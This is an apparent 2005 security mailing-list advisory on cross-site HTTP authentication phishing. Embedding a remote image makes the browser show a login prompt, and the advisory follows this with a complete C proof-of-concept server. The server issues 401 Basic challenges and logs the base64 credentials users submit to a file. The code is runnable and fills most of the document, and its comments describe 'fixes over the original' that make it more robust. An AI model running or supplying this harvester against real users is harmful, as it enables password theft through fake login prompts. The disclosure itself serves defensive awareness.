Message-ID: <4ee142450508100918bec9363@mail.gmail.com>
Date: Wed Aug 10 17:19:05 2005
From: justasfire at gmail.com (JustAsFire)
Subject: Cross-site http authentication
Discovered: by JustAsFire JustAsFire@...il.com
Vulnerable: Any web page in which you can insert images hosted on
other servers.
Description: If a web page contains an image hosted on a site that
requires authentication, the browser shows a username/password prompt
displaying that site's host name and authentication realm, and asks the
user for credentials. A malicious HTTP server can therefore be used to
log the credentials of any user who answers the prompt; with HTTP Basic
authentication the credentials arrive base64-encoded, which is trivially
reversible.
POC:
/*******************************************************************************
***name : AuthServer.c
***author : JustAsFire JustAsFire[at]gmail.com
***description : a very simple web server which answers every connection
***              with a 401 challenge (WWW-Authenticate: Basic). If the
***              client then authenticates, the username:password token
***              is appended to the file userlog (base64-encoded — this
***              is an encoding, NOT encryption; anyone who can read the
***              file can decode it).
***
***
*********************************************************************************/
#include <arpa/inet.h>
#include <errno.h>
#include <netinet/in.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/socket.h>
#include <unistd.h>
#define MAXPENDING 5
#define BUFFSIZE 10000
/* Report the last failing call (errno text prefixed by mess) and exit with status 1. */
void Die(char *mess)
{
    perror(mess);
    exit(1);
}
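/*
 * Look for an "Authorization: Basic <token>" header in a NUL-terminated
 * request buffer and append the token to the file "userlog".
 *
 * Fixes over the original: the token is copied only up to the end of its
 * own header line (CR or LF) or the end of the buffer — the old loop
 * copied a fixed "strlen(p) - 25" bytes, which truncated or over-read
 * depending on which headers followed; the copy is bounded by sizeof s
 * and always NUL-terminated (the old buffer was printed unterminated);
 * fopen() failure is reported instead of dereferencing NULL.
 *
 * buffer: NUL-terminated request text (NULL is tolerated and ignored).
 * Returns 1 when a Basic token was found (whether or not the log write
 *         succeeded), 0 when the header is absent or the token is too long.
 *
 * The stored token is base64 — an encoding, not encryption; anyone who
 * can read "userlog" can recover the user:password pair.
 */
int GetCredientials(char *buffer)
{
    static const char marker[] = "Authorization: Basic ";
    char s[200];
    char *p;
    size_t len;
    FILE *f;

    if (buffer == NULL)
        return 0;

    p = strstr(buffer, marker);
    if (p == NULL)
        return 0;
    p += sizeof marker - 1;                 /* skip the header name itself */

    /* Token length: up to the end of this header line or end of buffer. */
    len = strcspn(p, "\r\n");
    if (len >= sizeof s) {
        fprintf(stderr, "Over-long Authorization header (%zu bytes) ignored\n", len);
        return 0;
    }
    memcpy(s, p, len);
    s[len] = '\0';

    printf("\n%s\n", s);

    f = fopen("userlog", "a");
    if (f == NULL) {
        perror("fopen userlog");
        return 1;                           /* credential seen, just not logged */
    }
    fprintf(f, "%s\n", s);
    if (fclose(f) != 0)
        perror("fclose userlog");           /* fclose flushes; report a lost write */
    return 1;
}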
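/*
 * Serve one client connection: read its request, record any Basic
 * credentials it carried via GetCredientials(), otherwise answer with a
 * 401 challenge.  The socket is always closed before returning.
 *
 * Fixes over the original: the request is NUL-terminated before it is
 * searched (read() does not terminate, so strstr() could run off the end
 * of the buffer); a failed read on one client is logged and dropped
 * instead of exit()ing the whole server; write() is checked and looped
 * for short writes; the 401 response uses CRLF line endings, announces
 * the close that follows, and sends an empty body with Content-Length
 * instead of "Transfer-Encoding: chunked" with no terminating chunk.
 *
 * sock: connected TCP socket, owned (and closed) by this function.
 */
void HandleClient(int sock)
{
    char buffer[BUFFSIZE];
    ssize_t n;

    /* Leave one byte for the terminator GetCredientials() relies on. */
    n = read(sock, buffer, sizeof buffer - 1);
    if (n < 0) {
        perror("Failed to receive bytes from client");
        close(sock);
        return;
    }
    buffer[n] = '\0';

    if (GetCredientials(buffer) == 0) {
        static const char challenge[] =
            "HTTP/1.1 401 Unauthorized\r\n"
            "Server: AuthServer/0.01 (Unix)\r\n"
            "WWW-Authenticate: Basic realm=\" ...It's a scam don't do it... \"\r\n"
            "Content-Type: text/html; charset=iso-8859-1\r\n"
            "Content-Length: 0\r\n"
            "Connection: close\r\n"
            "\r\n";
        size_t off = 0;

        /* write() may send less than asked; keep going until done or it fails. */
        while (off < sizeof challenge - 1) {
            ssize_t w = write(sock, challenge + off, sizeof challenge - 1 - off);
            if (w < 0) {
                perror("Failed to send 401 challenge");
                break;
            }
            off += (size_t)w;
        }
    }
    close(sock);
}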
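/*
 * Entry point: bind a listening TCP socket on the port given as argv[1]
 * and serve clients one at a time with HandleClient().
 *
 * Fixes over the original: the port is parsed with strtol() and
 * range-checked, so "abc" or an out-of-range value is rejected instead
 * of silently becoming port 0 or being truncated by htons(); SO_REUSEADDR
 * lets the PoC be restarted without waiting out TIME_WAIT; an accept()
 * interrupted by a signal is retried rather than killing the server.
 */
int main(int argc, char *argv[])
{
    int serversock, clientsock;
    int on = 1;
    struct sockaddr_in server, client;
    char *end;
    long port;

    if (argc != 2) {
        fprintf(stderr, "USAGE: AuthServer <port>\n");
        exit(1);
    }

    errno = 0;
    port = strtol(argv[1], &end, 10);
    if (end == argv[1] || *end != '\0' || errno == ERANGE ||
        port < 1 || port > 65535) {
        fprintf(stderr, "Invalid port: %s\n", argv[1]);
        exit(1);
    }

    if ((serversock = socket(PF_INET, SOCK_STREAM, IPPROTO_TCP)) < 0) {
        Die("Failed to create socket");
    }
    /* Best effort: failing to set the option is not fatal for a PoC. */
    if (setsockopt(serversock, SOL_SOCKET, SO_REUSEADDR, &on, sizeof on) < 0) {
        perror("setsockopt(SO_REUSEADDR)");
    }

    memset(&server, 0, sizeof server);
    server.sin_family = AF_INET;
    server.sin_addr.s_addr = htonl(INADDR_ANY);
    server.sin_port = htons((unsigned short)port);
    if (bind(serversock, (struct sockaddr *)&server, sizeof server) < 0) {
        Die("Failed to bind the server socket");
    }
    if (listen(serversock, MAXPENDING) < 0) {
        Die("Failed to listen on server socket");
    }

    fprintf(stdout, "Created by: JustAsFire -- JustAsFire[at]gmail.com\n");
    fprintf(stdout, "Listening for connections...\n");

    for (;;) {
        socklen_t clientlen = sizeof client;

        clientsock = accept(serversock, (struct sockaddr *)&client, &clientlen);
        if (clientsock < 0) {
            if (errno == EINTR) {
                continue;               /* interrupted by a signal; keep serving */
            }
            Die("Failed to accept client connection");
        }
        fprintf(stdout, "Client connected: %s\n", inet_ntoa(client.sin_addr));
        HandleClient(clientsock);
    }
}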